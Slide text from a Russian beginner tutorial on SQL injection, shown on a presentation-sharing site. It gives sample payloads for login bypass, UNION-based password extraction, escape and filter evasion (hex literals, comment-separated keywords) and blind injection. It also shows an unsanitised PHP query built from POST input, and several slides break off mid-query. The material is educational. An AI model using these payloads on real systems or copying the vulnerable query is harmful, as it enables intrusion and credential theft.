- Главная
- Разное
- Дизайн
- Бизнес и предпринимательство
- Аналитика
- Образование
- Развлечения
- Красота и здоровье
- Финансы
- Государство
- Путешествия
- Спорт
- Недвижимость
- Армия
- Графика
- Культурология
- Еда и кулинария
- Лингвистика
- Английский язык
- Астрономия
- Алгебра
- Биология
- География
- Детские презентации
- Информатика
- История
- Литература
- Маркетинг
- Математика
- Медицина
- Менеджмент
- Музыка
- МХК
- Немецкий язык
- ОБЖ
- Обществознание
- Окружающий мир
- Педагогика
- Русский язык
- Технология
- Физика
- Философия
- Химия
- Шаблоны, картинки для презентаций
- Экология
- Экономика
- Юриспруденция
SQLi for scrubz презентация
Содержание
- 1. SQLi for scrubz
- 2. Понятие таблиц и работа с ними Database
- 3. Синтаксис Ключевые слова в запросе SELECT *column_name* FROM *table_name* WHERE *condition*
- 4. SELECT * FROM Коты WHERE Хозяин =
- 5. Таблица: data Столбцы: id, username, pass Запрос:
- 6. Таблица: data Столбцы: id, username, pass Запрос:
- 7. Таблицы: data, private_data Столбцы: id, username, pass
- 8. Функции LIKE SELECT username FROM users WHERE pass LIKE
- 9. MID MID(*value*, *number of starting symbol*, *hom many
- 10. GROUP BY SELECT * FROM users GROUP
- 11. Экранирование символов Экранирование символов — замена в тексте
- 12. Фильтрация символов 0x74657874 = text SELECT *
- 13. Определение уязвимости Обычный и слепой метод $name
- 14. Слепой метод Список функций:
Слайд 4SELECT * FROM Коты WHERE Хозяин = "Саймон"
SELECT * FROM Коты WHERE Возраст
1 AND Возраст < 5 " alt="">Слайд 5Таблица: data
Столбцы: id, username, pass
Запрос: SELECT * FROM data WHERE id = '$text'
$text = ' or id = 1 --
Простейшая уязвимость
Слайд 6Таблица: data
Столбцы: id, username, pass
Запрос: SELECT username FROM data WHERE id = '$text'
$text = 1' UNION SELECT pass FROM data WHERE id = 1 --
How to UNION
$text = ' UNION SELECT pass FROM data WHERE id = 1 --
Слайд 7Таблицы: data, private_data
Столбцы: id, username, pass
Запрос: SELECT * FROM data WHERE id
$text = ' UNION SELECT *,1 FROM data WHERE id = 1238 --
Слайд 8Функции
LIKE
SELECT username FROM users WHERE pass LIKE '%qwe%'
SELECT username FROM users WHERE pass LIKE '%qwe_'
IF
IF('pass'
IF((SELECT username FROM users WHERE id = 1) = 'admin', 1, 0)
IF((SELECT username FROM users WHERE id = 1) LIKE 'qwer%', 1, 0)
'%' - неопределённое кол-во символов
'_' - один символ
Слайд 9MID
MID(*value*, *number of starting symbol*, *hom many symbols*)
MID('value', 3, 2) = 'lu'
MID('value',
CONCAT
CONCAT('lu', 'l') = 'lul'
SELECT id, CONCAT(username,' - ', pass) AS user_data
CONCAT('str1','str2',…,'strN') = 'str1str2...'
Слайд 11Экранирование символов
Экранирование символов — замена в тексте управляющих символов на соответствующие текстовые
Payload:
$text = ' UNION SELECT * FROM users; --
$text = \' UNION SELECT * FROM users; --
\ => \\
$text = \\' UNION SELECT * FROM users; --
Слайд 12Фильтрация символов
0x74657874 = text
SELECT * FROM users WHERE pass = 'text'
SELECT * FROM
Ошибка при выполнении запроса: «Unknown column 'text' in 'where clause'»
SELECT * FROM users WHERE pass = 0x74657874
SELECT/**/*/**/FROM/**/users/**/WHERE/**/pass/**/=/**/0x74657874
/* - начало блока комментариев
*/ - конец блока комментариев
Слайд 13Определение уязвимости
Обычный и слепой метод
$name = $_POST['name'];
$query = "SELECT phone_number FROM
$result = mysql_query($query);
Real life example
Слайд 14Слепой метод
Список функций:
IF, MID, SLEEP, GROUP BY
SELECT IF((SELECT username where
